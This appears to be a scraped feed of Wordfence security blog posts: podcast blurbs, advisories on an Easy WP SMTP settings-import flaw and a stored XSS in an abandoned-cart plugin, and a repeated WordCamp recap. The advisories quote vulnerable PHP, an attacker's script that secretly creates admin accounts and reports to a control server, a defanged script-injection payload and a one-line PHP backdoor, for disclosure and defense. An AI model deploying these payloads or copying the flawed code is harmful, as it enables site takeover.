Podcast Episode 3: The Cory Miller Interview and Active Exploits Target Easy WP SMTP Plugin

Welcome to Think Like a Hacker, Episode 3. In this episode Mikey Veenstra, a threat analyst at Wordfence, discusses an active exploit in the Easy WP SMTP plugin. This is breaking news which we added to the podcast at the very last minute.

We also chat with Cory Miller, the founder and former CEO of iThemes about how he created his business, why he sold to Liquid Web, what it’s like being an entrepreneur and much more. You can find Cory on Twitter at @corymiller303. And as always we cover the news with Kathy Zant.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast.

This week in the news we cover:

You can find me on Twitter as @mmaunder, Kathy as @kathyzant, and Mikey as @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 3: The Cory Miller Interview and Active Exploits Target Easy WP SMTP Plugin appeared first on Wordfence.

Read More

Hackers Abusing Recently Patched Vulnerability In Easy WP SMTP Plugin

Over the weekend, a vulnerability was disclosed and patched in the popular WordPress plugin Easy WP SMTP. The plugin allows users to configure SMTP connections for outgoing email, and has a userbase of over 300,000 active installs. The vulnerability is only present in version 1.3.9 of the plugin, and all of the plugin’s users should update to 1.3.9.1 as quickly as possible to address the flaw.

This vulnerability is under active attack, being used by malicious actors to establish administrative control of affected sites en masse. We have released a firewall rule which prevents exploitation of the flaw, protecting Wordfence Premium sites which haven’t yet updated the affected plugin. Our free users will gain access to the new rule in thirty days, but they can protect themselves in the meantime by updating their plugins.

In today’s post, we’ll look at the vulnerability, how attackers are abusing it, and what users should do if they believe they’ve been put at risk.

Insufficient Access Controls In Import/Export Feature

The root of the vulnerability is in the Import/Export functionality which was added to Easy WP SMTP in version 1.3.9. The new code resides in the plugin’s admin_init hook, which executes in wp-admin/ scripts like admin-ajax.php and admin-post.php.

$is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );
if ( $is_import_settings ) {
  $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );
  if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {
      echo $err_msg;
      wp_die();
  }
  $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );
  try {
      $in = unserialize( $in_raw );
      if ( empty( $in[ 'data' ] ) ) {
          echo $err_msg;
          wp_die();
      }
      if ( empty( $in[ 'checksum' ] ) ) {
          echo $err_msg;
          wp_die();
      }
      if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {
          echo $err_msg;
          wp_die();
      }
      $data = unserialize( $in[ 'data' ] );
      foreach ( $data as $key => $value ) {
          update_option( $key, $value );
      }
      set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );
      $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
      wp_safe_redirect( $url );
      exit;

When this hook fires, the plugin checks for the existence of the POST parameter swpsmtp_import_settings. If this parameter is set to 1, it assumes that an import is taking place and checks for a file upload as swpsmtp_import_settings_file. The contents of the uploaded file are unserialized, and update_option is run on each given key/value pair.

A number of issues present themselves in this process.

First, and most importantly, no capabilities checks are performed during this process so an attacker does not need any special permissions to exploit this flaw.

Next, instead of running on a dedicated AJAX action, REST endpoint, or dashboard page, the importer looks for an import with every admin_init call. This means the code will run for unauthenticated users, as this call is made even for logged-out sessions. Without this element, an attacker would at least need subscriber-level access to a victim’s site.

Then, unsanitized user input is passed to unserialize(), which inherently creates an object injection vulnerability.

Lastly, any user-provided options are updated, rather than a set of plugin-specific options. This allows an attacker to alter any values in a site’s wp_options table, which is the activity taking place against vulnerable sites at this time.

Exploit Campaigns Taking Over Vulnerable Sites

The Defiant Threat Intelligence team is actively tracking activity from two distinct threat actors associated with this vulnerability.

Both of the campaigns launch their initial attacks identically, by using the proof of concept (PoC) exploit detailed in NinTechNet’s original disclosure of the vulnerability. These attacks match the PoC exactly, down to the checksum, and enable users to register administrator accounts by changing default_role to “administrator”, and enabling users_can_register. Then, the attacker uses these new settings to register an administrator user for themselves.

From here, the campaigns diverge. The first threat actor’s activity stops after this point, suggesting that this stage was the only automated step of their process and they’re just assembling a number of rogue admin accounts for later use.

The other campaign continues by altering the victim site’s siteurl and home options to trigger malicious redirects when the site is visited, then injecting malicious <script> tags into all PHP files on the affected site with the string “index” present in their name. This obviously affects files named index.php, but also happens to impact files like class-link-reindex-post-service.php, present in Yoast’s SEO plugin.

In these cases, we’ve identified two domains used in the options values and script injections: setforconfigplease[.]com, and getmyfreetraffic[.]com. These domains are followed by an alphanumeric path string, presumably used similar to affiliate tracking codes to identify the source of the newly created traffic. When encountered by a user, the redirecting sites check for and assign cookies to track these users and determine where to redirect them. The most common redirects seen from these sources are tech support scams warning that users’ computers may be affected by the Zeus virus, among others.

Notably, both of these domains resolve to the same host IP address, which also hosts the malicious domains somelandingpage[.]com and setforspecialdomain[.]com, both of which have been seen in similar attack campaigns.

Next Steps

The attacks against this vulnerability are widespread, and successful exploits can grant full control of vulnerable sites to the attackers. As always, it’s important for users to regularly update their plugins in order to apply the security patches for vulnerabilities like these. Easy WP SMTP version 1.3.9.1 prevents unauthenticated access to the import script, as well as restricting affected options to only include expected values.

For typical WordPress users, if you believe your site may have been compromised as a result of this or any other vulnerability, consider reaching out to our team for a site cleaning. Otherwise, be on the lookout for the following indicators of compromise (IOCs):

  • Logged traffic from the following IPs:
    • 185.212.131.45
    • 185.212.128.22
    • 185.212.131.46
    • 86.109.170.200
  • Database siteurl and home values not matching their intended values, especially including the following domains:
    • setforconfigplease[.]com
    • getmyfreetraffic[.]com
  • Administrator accounts present for unknown users. For example:
    • devidpentesting99
    • larryking99
  • Malicious <script> tags injected into the first line of index.php files. For example:
    • <script type='text/javascript' async src='hXXps://setforspecialdomain[.]com/in2herg42t2?type=in2&frm=scr&'></script>

As this situation shows, the time between the publication of vulnerability details and the first round of attacks can be incredibly short. Even the most fastidious site owners can be caught unaware and left open to attack. A firewall backed by a team focused 100% on WordPress security is must-have insurance for these situations. If your site matters to you, consider upgrading to Wordfence Premium to guard against future vulnerabilities of this nature.

The post Hackers Abusing Recently Patched Vulnerability In Easy WP SMTP Plugin appeared first on Wordfence.

Read More

Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview

Welcome to Think Like a Hacker, Episode 2. In this episode Mikey Veenstra, a threat analyst at Wordfence, discusses a serious XSS vulnerability in an abandoned cart plugin. We also chat with Adam Warner, a well known figure in the WordPress community. In our interview we chat about Adam’s personal WordPress journey, community engagement success and the future of WordPress. You can find Adam on Twitter at @wpmodder. And as always we cover the news with Kathy Zant.

Find us on iTunes, Spotify, YouTube, SoundCloud, TuneIn and Stitcher. More platforms coming soon!

Click here to download an MP3 version of this podcast.

This week in the news we cover:

  • The web just took a big step toward a password-free future with WebAuthn. The Worldwide Web Consortium approved the WebAuthn standard on March 4. We look at how it works, why this is important, and what it means for WordPress.
  • A marketing company left a massive database of detailed marketing data exposed. Security researchers discovered the database, including a trove of personally identifiable information about over 800 million people.
  • Researchers have discovered a collection of MongoDBs containing information collected by China about their citizens from a variety of platforms, tied to individual profiles and distributed to police across the country.
  • It’s been 30 years of the web, and Sir Tim Berners-Lee wrote a blog post about the state of the web some thoughts on where we’re going next.

You can find me on Twitter as @mmaunder, Kathy as @kathyzant, and Mikey as @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview appeared first on Wordfence.

Read More

Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview

Welcome to Think Like a Hacker, Episode 2. In this episode Mikey Veenstra, a threat analyst at Wordfence, discusses a serious XSS vulnerability in an abandoned cart plugin. We also chat with Adam Warner, a well known figure in the WordPress community. In our interview we chat about Adam’s personal WordPress journey, community engagement success and the future of WordPress. You can find Adam on Twitter at @wpmodder. And as always we cover the news with Kathy Zant.

Find us on iTunes, Spotify, YouTube, SoundCloud, TuneIn and Stitcher. More platforms coming soon!

Click here to download an MP3 version of this podcast.

This week in the news we cover:

  • The web just took a big step toward a password-free future with WebAuthn. The Worldwide Web Consortium approved the WebAuthn standard on March 4. We look at how it works, why this is important, and what it means for WordPress.
  • A marketing company left a massive database of detailed marketing data exposed. Security researchers discovered the database, including a trove of personally identifiable information about over 800 million people.
  • Researchers have discovered a collection of MongoDBs containing information collected by China about their citizens from a variety of platforms, tied to individual profiles and distributed to police across the country.
  • It’s been 30 years of the web, and Sir Tim Berners-Lee wrote a blog post about the state of the web some thoughts on where we’re going next.

You can find me on Twitter as @mmaunder, Kathy as @kathyzant, and Mikey as @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 2: Mikey Veenstra Talks XSS Vulnerability + The Adam Warner Interview appeared first on Wordfence.

Read More

XSS Vulnerability in Abandoned Cart Plugin Leads To WordPress Site Takeovers

Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce. The plugin, which we’ll be referring to by its slug woocommerce-abandoned-cart, allows the owners of WooCommerce sites to track abandoned shopping carts in order to recover those sales. A lack of sanitation on both input and output allows attackers to inject malicious JavaScript payloads into various data fields, which will execute when a logged-in user with administrator privileges views the list of abandoned carts from their WordPress dashboard.

At this time, any WordPress sites making use of woocommerce-abandoned-cart, or its premium version, woocommerce-abandoned-cart-pro, are advised to update to the latest available version as soon as possible. Sites making use of the Wordfence WAF, both free and premium, are protected from the attacks detailed in this post due to the firewall’s built-in XSS protection. Affected users without Wordfence installed should consider a Site Security Audit to confirm the integrity of their WordPress sites.

In today’s post, we’ll take a look at the details of this vulnerability, how attackers are exploiting it in the wild to take over sites, and what site owners should do if they believe they’ve been attacked.

XSS Vulnerability In Detail

The guest-input side of woocommerce-abandoned-cart begins when an unauthenticated user builds a shopping cart and begins the checkout process.

An example of the Billing Details page on a basic WooCommerce site. This data is stored by woocommerce-abandoned-cart in case checkout isn’t completed.

With the plugin active, all of the data input by the guest is sent back to the plugin using the save_data AJAX action. The intent is if the checkout process is not completed, whether the page was navigated away from, or the browser closed, or the shopper just got distracted, the plugin can inform the shop’s owners within their dashboard.

function save_data() {
      if ( ! is_user_logged_in() ) {
          global $wpdb, $woocommerce;    
          if ( isset($_POST['billing_first_name']) && $_POST['billing_first_name'] != '' ){
              wcal_common::wcal_set_cart_session( 'billing_first_name', $_POST['billing_first_name'] );
          }
          if ( isset($_POST['billing_last_name']) && $_POST['billing_last_name'] != '' ) {
              wcal_common::wcal_set_cart_session( 'billing_last_name', $_POST['billing_last_name'] );
          }            
          if ( isset($_POST['billing_company']) && $_POST['billing_company'] != '' ) {
              wcal_common::wcal_set_cart_session( 'billing_company', $_POST['billing_company'] );
          }   

However, the function used to handle these AJAX requests fails to perform any input sanitization on the various $_POST fields it receives. As shown in the above snippet, shopper data fields like billing_first_namebilling_last_name, and billing_company are stored directly as they were received. The data pulled from this request is stored in the WordPress database, and can be accessed by an administrator from their dashboard. There, they can view the individual carts, their customer information, and order totals.

An abandoned cart, patiently waiting to be recovered.

When this data is rendered in the administrator’s browser, no output sanitization takes place either. Particularly, billing_first_name and billing_last_name are concatenated into a single “Customer” field in the output table. This field is what hackers are targeting in active campaigns against this flaw.

Malicious JavaScript Hijacking Admin Sessions

The attacks on this vulnerability have been consistent in their execution. The attacker builds a cart, supplies bogus contact information, and abandons the cart. The names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, but the billing_last_name field contains the injected payload <script src=hXXps://bit[.]ly/2SzpVBY></script>.

Malware campaigns making use of URL shortening services like bit.ly are common. In addition to providing a basic layer of abstraction between the malicious request and the actual URL of the script, the shorter addresses make it easier to beat string length restrictions (especially when bypass techniques are employed, which isn’t the case in this scenario). Not only that, but if the domain at the other end of the URL shortener is taken down, the attacker can just point the bit.ly address at a new domain and keep all of their previous injections alive.

In this case, the bit.ly address resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js. The domain, which attempts to look innocuous by impersonating the legitimate cdn.bigcommerce.com, points to the command and control (C2) server behind the infection. The target script, visionstat.js, is a malicious JavaScript payload which uses the victim’s own browser session to deploy backdoors on their site. Two backdoors are deployed: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it.

function processNewUser(adminhref){
	var username = 'woouser';
	var email = 'woouser401a@mailinator.com';
	var password = 'K1YPRka7b0av1B';
	
	pfr=document.createElement('iframe');
	pfr.style.visibility='hidden';
	pfr.name='pfr';
	pfr.src=adminhref+'/user-new.php';

In the first backdoor, a hidden iframe is created which opens the new user creation form. This form is filled out with the information from the first few lines of the function seen above, with a username of “woouser” and an email address at Mailinator, a popular disposable inbox provider. The user is given the Administrator role, and the account is created.

When this new user is created, the attacker is notified in two ways. First, the visionstat.js payload makes an AJAX call to hXXps://cdn-bigcommerce[.]com/counterstat.php to phone home to its C2 with the URL of the compromised site. Second, the WordPress application running on the site will generate a new user notification email, which is sent to the Mailinator inbox associated with the rogue administrator account.

for (var at = 0; at < fl.length; at++) {
	try{
		if(fl[at].href.indexOf('action=activate&plugin=')>0){
			funcURL = fl[at].href.match(/action=activate&plugin=([^&]+)/)[1];

			//console.log(funcURL);
			break;
		}
	}catch(e){
	}
}
//console.log(funcURL);
if (funcURL == '')
{
	maindata.details = "Error: No disabled plugins!";
	SendData(maindata);
}
else
{
	maindata.details = "Found disabled plugin (" + funcURL + ")";
	SendData(maindata);
	processPluginEdit(adminhref, pfr1, funcURL);
}

For the second backdoor, visionstat.js opens another hidden iframe, this time to the site’s Plugins menu. There, it scans the list of installed plugins for an “Activate” link, which signifies an inactive plugin is present. Then, new content is injected into the inactive plugin, containing a simple PHP backdoor script.

<?php @extract($_REQUEST);@die($cdate($adate));

By sending a POST request to this script containing a PHP function as the cdate parameter, and an argument for that function as adate, they are able to perform a variety of actions, from executing arbitrary PHP code to running system commands on the compromised server. As with the creation of a rogue administrator, visionstat.js also phones home to the C2 server to inform the attacker that this backdoor was successfully deployed.

Plugin Vendor Deploys Unique Patch

Tyche Softwares, the plugin’s vendor, was made aware of the vulnerability via user reports on the WordPress.org forums. A patch was quickly released, and a security notice was posted in the plugin’s changelog. The patched version of the plugin applies WordPress’s built-in sanitize_text_field function to prevent the injection of new scripts.

            if ( 'yes' !== get_option( 'ac_lite_user_cleanup' ) ) {
                $query_cleanup = "UPDATE `".$wpdb->prefix."ac_guest_abandoned_cart_history_lite` SET 
                    billing_first_name = IF (billing_first_name LIKE '%<%', '', billing_first_name),
                    billing_last_name = IF (billing_last_name LIKE '%<%', '', billing_last_name),
                    billing_company_name = IF (billing_company_name LIKE '%<%', '', billing_company_name),
                    billing_address_1 = IF (billing_address_1 LIKE '%<%', '', billing_address_1),
                    billing_address_2 = IF (billing_address_2 LIKE '%<%', '', billing_address_2),
                    billing_city = IF (billing_city LIKE '%<%', '', billing_city),
                    billing_county = IF (billing_county LIKE '%<%', '', billing_county),
                    billing_zipcode = IF (billing_zipcode LIKE '%<%', '', billing_zipcode),
                    email_id = IF (email_id LIKE '%<%', '', email_id),
                    phone = IF (phone LIKE '%<%', '', phone),
                    ship_to_billing = IF (ship_to_billing LIKE '%<%', '', ship_to_billing),
                    order_notes = IF (order_notes LIKE '%<%', '', order_notes),
                    shipping_first_name = IF (shipping_first_name LIKE '%<%', '', shipping_first_name),
                    shipping_last_name = IF (shipping_last_name LIKE '%<%', '', shipping_last_name),
                    shipping_company_name = IF (shipping_company_name LIKE '%<%', '', shipping_company_name),
                    shipping_address_1 = IF (shipping_address_1 LIKE '%<%', '', shipping_address_1),
                    shipping_address_2 = IF (shipping_address_2 LIKE '%<%', '', shipping_address_2),
                    shipping_city = IF (shipping_city LIKE '%<%', '', shipping_city),
                    shipping_county = IF (shipping_county LIKE '%<%', '', shipping_county)";

                $wpdb->query( $query_cleanup );

                $email = 'woouser401a@mailinator.com';
                $exists = email_exists( $email );
                if ( $exists ) {
                    wp_delete_user( esc_html( $exists ) );
                }

                update_option( 'ac_lite_user_cleanup', 'yes' );
            }

In a rather direct attempt to address the active exploitation of this vulnerability, the developers also implemented a cleanup function in the patched version of their plugin. This function first performs a scan of the existing abandoned cart data, and removes any entries where a < symbol is encountered, which prevents subsequent execution of the malicious <script src=hXXps://bit[.]ly/2SzpVBY></script> payloads that may be present.

The next block of code is the interesting one, though. Because the plugin’s developers were made aware of this flaw due to reports of these same exploits, they include a check for the existence of the email address registered with the malicious “woouser” account. If a user with this email is identified, the plugin deletes that user.

Next Steps

While these are clever steps in addressing current incarnations of this campaign, it’s important that site owners don’t rely on these measures alone. This patch does not detect or remove the secondary backdoors injected into inactive plugins, and the nature of the initial XSS payload allows the email address of newly created rogue admins to be changed with very little effort by modifying the visionstat.js script hosted on the C2 site, or by changing the target of the bit.ly shortlink. The patch also leaves output sanitization untouched, meaning preexisting injected scripts can still execute in the dashboard if the cleanup function fails to remove them for any reason.

Our recommendation for site owners using either woocommerce-abandoned-cart or woocommerce-abandoned-cart-pro is to review their database contents for possible script injections. The exact name of the table to check will vary depending on your database prefix and the Lite/Pro status of your installed plugin, but guest shopper data can be found in the table with ac_guest_abandoned_cart_history in its name. After this check has been completed, review the user accounts present on your site. If any unauthorized administrator accounts are present, delete them immediately and begin your incident response process.

The good news for current Wordfence users is that these attacks are blocked by the XSS protection present in both the free and premium versions of our firewall. If you used one of these abandoned cart plugins and were not a Wordfence user prior to this patch, installing Wordfence and running a scan will tell you whether you have been hacked. Also consider reaching out to our team for a Site Security Audit, which includes a free year of Wordfence Premium in addition to the peace of mind provided by the audit itself.

Despite the release of a patch, these attacks are still ongoing and our investigation reveals new sites compromised daily. Please consider sharing this post as a public service announcement, to improve community awareness of these attacks and prompt updates for those who need them. As always, thank you for reading.

The post XSS Vulnerability in Abandoned Cart Plugin Leads To WordPress Site Takeovers appeared first on Wordfence.

Read More

Think Like a Hacker Podcast Episode 1: An Interview with Josepha Haden

Josepha Haden is the Executive Director of the WordPress project at Automattic. She oversees and directs all contributor teams in their work to build and maintain WordPress. Josepha can be found at https://josepha.blog. In our news segment, we talk about recent vulnerabilities in the Freemius library affecting WordPress plugins, the CoinHive shutdown, and why potential changes in WordPress core development will benefit end users’ security and more.

Click here to download an MP3 version of this podcast. Note that we are in the process of syndicating video and audio versions of this podcast to your favorite player, and we needed to publish our first episode to enable syndication. So check back in a few days and you should find us just about everywhere. Thanks for your patience.

This week in the news we cover:

  • WordPress as of version 5.1 now alerts site owners on the dashboard if they’re using an out of date version of PHP.
  • The 2018 hacked site report from GoDaddy Security/Sucuri indicates increased prevalence of WordPress sites in their site cleaning business. In better news, they’re seeing more WordPress sites updated than in years past, and the WordPress sites are being updated much more frequently than eCommerce platforms.
  • Freemius, a library used by a number of plugins with large installation bases, recently experienced a vulnerability disclosure and a challenging experience with a security researcher. Their blog post is a heartening read about how we all can handle security vulnerability disclosures that serve customers and the community as a whole.
  • The widely used Chrome browser requires an update to patch a very serious vulnerability.
  • WordPress core team is hoping to tighten major release cycles that hopes to streamline development for contributors as well as encourage more site owners to enable autoupdating.
  • A distributed cryptocurrency mining platform called CoinHive is ceasing operations. CoinHive was popular amongst hackers as a new way to mine cryptocurrency on hacked websites, but the crash in cryptocurrency value made it less profitable.

You can find me on Twitter as @mmaunder and Kathy as @kathyzant. Please don’t hesitate to post your feedback in the comments below.

The post Think Like a Hacker Podcast Episode 1: An Interview with Josepha Haden appeared first on Wordfence.

Read More

WordCamp Phoenix Recap

The first WordCamp for 2019 took place this past weekend in Phoenix, Arizona with nearly 700 attendees, and we were delighted to be involved. In addition to our gold-level sponsorship, Wordfence Threat Analyst Mikey Veenstra spoke on Friday, and our Client Partner Kathy Zant worked for months on the organizing committee to bring this highly successful camp together.

The WordCamp theme was the 10-year reunion, complete with Prom, Homecoming, and Sadie Hawkins level sponsorships, letterman jackets for the speakers, and some gorgeous PE-class t-shirts for attendees.

WordCamp Phoenix and our own Kathy Zant

The educational theme was a perfect parallel to the deep learning taking place in many of the sessions. With so many hosting, agency, and media companies based here, and a vibrant WordPress community over 2,500 members strong, the Phoenix WordCamp committee ensured that the program was on the cutting edge of WordPress development. Even with the deeply technical development track, a robust eCommerce track and a beginner’s workshop meant that there were sessions for everyone, no matter their skill level.

Going Deep with the Hacker Mindset

As with previous WordCamps, we brought hacker culture to the event to help WordPress users “think like a hacker” so they can better defend themselves from the relentless attacks from malicious actors. With lock picking, our team taught hundreds of people how to get into the mental zone for getting beyond security. Hackers are relentless in looking for vulnerabilities in WordPress sites. Site owners have to be relentless in their defensive posture in order to defend themselves.

2019 Wordfence lockpick set

For 2019, we rolled out a brand new “think like a hacker” lock pick set for anyone who could get into one of our basic training locks. We love the look in a beginner’s eyes when they pop a lock for the first time. For those who have never picked a lock or exploited a vulnerability in a website, our default belief system is that everything is secure. We see a padlock on a gym locker, and we think of it as secure. Once someone has seen how security works, they are more adept with securing their own assets. And when we can think like a hacker, we can choose the right tools to secure your online assets including your WordPress site.

On day two, we brought out the strongest locks. We had some contests to see who could get beyond the defenses of some of the strongest locks available. We had quite a few attendees do quite well, including one beginning lock picker that got into our strongest lock.

the monster lock

We have a number of team members who live in the Phoenix area, so we had a a full team at the table. In addition, our Senior Operations Engineer Scott Bisker joined us from the snowy east coast for some fun in the desert.

The WCPHX Wordfence Team

Scott Bisker, Mikey Veenstra, Ram Gall, Nathan Smith

In the video below, Scott skillfully teaches a WordCamp attendee how to pick a lock. Watch and see how fast she gets the lock open.

As with all of the WordCamps we attend and sponsor, we made new friends, learned about their security concerns and gave advice on thwarting increasingly sophisticated attacks. We also shared new tools like Wordfence Central that can help site owners more quickly manage security alerts.

Building Friendships

Because so many Wordfence employees are based in the Phoenix area, along with world-class agencies, hosting providers, and security professionals, we had a little social reception the week immediately following WordCamp Phoenix at the Hotel Valley Ho in Scottsdale. Many of our new friends around the valley joined us for an excellent event.

We had hoped to have it on the Hotel Valley Ho rooftop, but apparently, when we plan a social event at the start of peak tourism season in Phoenix, we summon unprecedented winter storms from mother nature. The superstition mountains were snowcapped, a sight rarely seen in Phoenix.

While it was cold outside, inside we had great conversations, some amazing food including a make your own slider station, and we closed down the hotel bar afterward.

Mark Rudder, Kathy Zant, Mark Maunder, and Mikey Veenstra

Wordfence is uniquely situated as a premier leader of WordPress security with no allegiance to a large corporate entity. This independence gives us something not many other companies have, in that we have friends at many hosting providers, many security providers, and many WordPress agencies and users. We’re here to serve the interests of the greater community as a whole, and our independence allows us to do that.

It allows us to see an opportunity in the security space and bring that to WordPress. It allows us to see connections in the hosting space, and help end users make decisions in hosting that best serve each of their individual needs. It allows us to agnostically see where one WordPress user can benefit from an opportunity and help them make that connection.

Wordfence Social

Phoenix is an amazing city, and we’ll definitely be back to visit and be of service in making those connections again.

Where will we see you next?

We’re planning visits to a select number of WordCamps this year. Keep up with our travels on our new events page.

The post WordCamp Phoenix Recap appeared first on Wordfence.

Read More

WordCamp Phoenix Recap

The first WordCamp for 2019 took place this past weekend in Phoenix, Arizona with nearly 700 attendees, and we were delighted to be involved. In addition to our gold-level sponsorship, Wordfence Threat Analyst Mikey Veenstra spoke on Friday, and our Client Partner Kathy Zant worked for months on the organizing committee to bring this highly successful camp together.

The WordCamp theme was the 10-year reunion, complete with Prom, Homecoming, and Sadie Hawkins level sponsorships, letterman jackets for the speakers, and some gorgeous PE-class t-shirts for attendees.

WordCamp Phoenix and our own Kathy Zant

The educational theme was a perfect parallel to the deep learning taking place in many of the sessions. With so many hosting, agency, and media companies based here, and a vibrant WordPress community over 2,500 members strong, the Phoenix WordCamp committee ensured that the program was on the cutting edge of WordPress development. Even with the deeply technical development track, a robust eCommerce track and a beginner’s workshop meant that there were sessions for everyone, no matter their skill level.

Going Deep with the Hacker Mindset

As with previous WordCamps, we brought hacker culture to the event to help WordPress users “think like a hacker” so they can better defend themselves from the relentless attacks from malicious actors. With lock picking, our team taught hundreds of people how to get into the mental zone for getting beyond security. Hackers are relentless in looking for vulnerabilities in WordPress sites. Site owners have to be relentless in their defensive posture in order to defend themselves.

2019 Wordfence lockpick set

For 2019, we rolled out a brand new “think like a hacker” lock pick set for anyone who could get into one of our basic training locks. We love the look in a beginner’s eyes when they pop a lock for the first time. For those who have never picked a lock or exploited a vulnerability in a website, our default belief system is that everything is secure. We see a padlock on a gym locker, and we think of it as secure. Once someone has seen how security works, they are more adept with securing their own assets. And when we can think like a hacker, we can choose the right tools to secure your online assets including your WordPress site.

On day two, we brought out the strongest locks. We had some contests to see who could get beyond the defenses of some of the strongest locks available. We had quite a few attendees do quite well, including one beginning lock picker that got into our strongest lock.

the monster lock

We have a number of team members who live in the Phoenix area, so we had a a full team at the table. In addition, our Senior Operations Engineer Scott Bisker joined us from the snowy east coast for some fun in the desert.

The WCPHX Wordfence Team

Scott Bisker, Mikey Veenstra, Ram Gall, Nathan Smith

In the video below, Scott skillfully teaches a WordCamp attendee how to pick a lock. Watch and see how fast she gets the lock open.

As with all of the WordCamps we attend and sponsor, we made new friends, learned about their security concerns and gave advice on thwarting increasingly sophisticated attacks. We also shared new tools like Wordfence Central that can help site owners more quickly manage security alerts.

Building Friendships

Because so many Wordfence employees are based in the Phoenix area, along with world-class agencies, hosting providers, and security professionals, we had a little social reception the week immediately following WordCamp Phoenix at the Hotel Valley Ho in Scottsdale. Many of our new friends around the valley joined us for an excellent event.

We had hoped to have it on the Hotel Valley Ho rooftop, but apparently, when we plan a social event at the start of peak tourism season in Phoenix, we summon unprecedented winter storms from mother nature. The superstition mountains were snowcapped, a sight rarely seen in Phoenix.

While it was cold outside, inside we had great conversations, some amazing food including a make your own slider station, and we closed down the hotel bar afterward.

Mark Rudder, Kathy Zant, Mark Maunder, and Mikey Veenstra

Wordfence is uniquely situated as a premier leader of WordPress security with no allegiance to a large corporate entity. This independence gives us something not many other companies have, in that we have friends at many hosting providers, many security providers, and many WordPress agencies and users. We’re here to serve the interests of the greater community as a whole, and our independence allows us to do that.

It allows us to see an opportunity in the security space and bring that to WordPress. It allows us to see connections in the hosting space, and help end users make decisions in hosting that best serve each of their individual needs. It allows us to agnostically see where one WordPress user can benefit from an opportunity and help them make that connection.

Wordfence Social

Phoenix is an amazing city, and we’ll definitely be back to visit and be of service in making those connections again.

Where will we see you next?

We’re planning visits to a select number of WordCamps this year. Keep up with our travels on our new events page.

The post WordCamp Phoenix Recap appeared first on Wordfence.

Read More

WordCamp Phoenix Recap

The first WordCamp for 2019 took place this past weekend in Phoenix, Arizona with nearly 700 attendees, and we were delighted to be involved. In addition to our gold-level sponsorship, Wordfence Threat Analyst Mikey Veenstra spoke on Friday, and our Client Partner Kathy Zant worked for months on the organizing committee to bring this highly successful camp together.

The WordCamp theme was the 10-year reunion, complete with Prom, Homecoming, and Sadie Hawkins level sponsorships, letterman jackets for the speakers, and some gorgeous PE-class t-shirts for attendees.

WordCamp Phoenix and our own Kathy Zant

The educational theme was a perfect parallel to the deep learning taking place in many of the sessions. With so many hosting, agency, and media companies based here, and a vibrant WordPress community over 2,500 members strong, the Phoenix WordCamp committee ensured that the program was on the cutting edge of WordPress development. Even with the deeply technical development track, a robust eCommerce track and a beginner’s workshop meant that there were sessions for everyone, no matter their skill level.

Going Deep with the Hacker Mindset

As with previous WordCamps, we brought hacker culture to the event to help WordPress users “think like a hacker” so they can better defend themselves from the relentless attacks from malicious actors. With lock picking, our team taught hundreds of people how to get into the mental zone for getting beyond security. Hackers are relentless in looking for vulnerabilities in WordPress sites. Site owners have to be relentless in their defensive posture in order to defend themselves.

2019 Wordfence lockpick set

For 2019, we rolled out a brand new “think like a hacker” lock pick set for anyone who could get into one of our basic training locks. We love the look in a beginner’s eyes when they pop a lock for the first time. For those who have never picked a lock or exploited a vulnerability in a website, our default belief system is that everything is secure. We see a padlock on a gym locker, and we think of it as secure. Once someone has seen how security works, they are more adept with securing their own assets. And when we can think like a hacker, we can choose the right tools to secure your online assets including your WordPress site.

On day two, we brought out the strongest locks. We had some contests to see who could get beyond the defenses of some of the strongest locks available. We had quite a few attendees do quite well, including one beginning lock picker that got into our strongest lock.

the monster lock

We have a number of team members who live in the Phoenix area, so we had a a full team at the table. In addition, our Senior Operations Engineer Scott Bisker joined us from the snowy east coast for some fun in the desert.

The WCPHX Wordfence Team

Scott Bisker, Mikey Veenstra, Ram Gall, Nathan Smith

In the video below, Scott skillfully teaches a WordCamp attendee how to pick a lock. Watch and see how fast she gets the lock open.

As with all of the WordCamps we attend and sponsor, we made new friends, learned about their security concerns and gave advice on thwarting increasingly sophisticated attacks. We also shared new tools like Wordfence Central that can help site owners more quickly manage security alerts.

Building Friendships

Because so many Wordfence employees are based in the Phoenix area, along with world-class agencies, hosting providers, and security professionals, we had a little social reception the week immediately following WordCamp Phoenix at the Hotel Valley Ho in Scottsdale. Many of our new friends around the valley joined us for an excellent event.

We had hoped to have it on the Hotel Valley Ho rooftop, but apparently, when we plan a social event at the start of peak tourism season in Phoenix, we summon unprecedented winter storms from mother nature. The superstition mountains were snowcapped, a sight rarely seen in Phoenix.

While it was cold outside, inside we had great conversations, some amazing food including a make your own slider station, and we closed down the hotel bar afterward.

Mark Rudder, Kathy Zant, Mark Maunder, and Mikey Veenstra

Wordfence is uniquely situated as a premier leader of WordPress security with no allegiance to a large corporate entity. This independence gives us something not many other companies have, in that we have friends at many hosting providers, many security providers, and many WordPress agencies and users. We’re here to serve the interests of the greater community as a whole, and our independence allows us to do that.

It allows us to see an opportunity in the security space and bring that to WordPress. It allows us to see connections in the hosting space, and help end users make decisions in hosting that best serve each of their individual needs. It allows us to agnostically see where one WordPress user can benefit from an opportunity and help them make that connection.

Wordfence Social

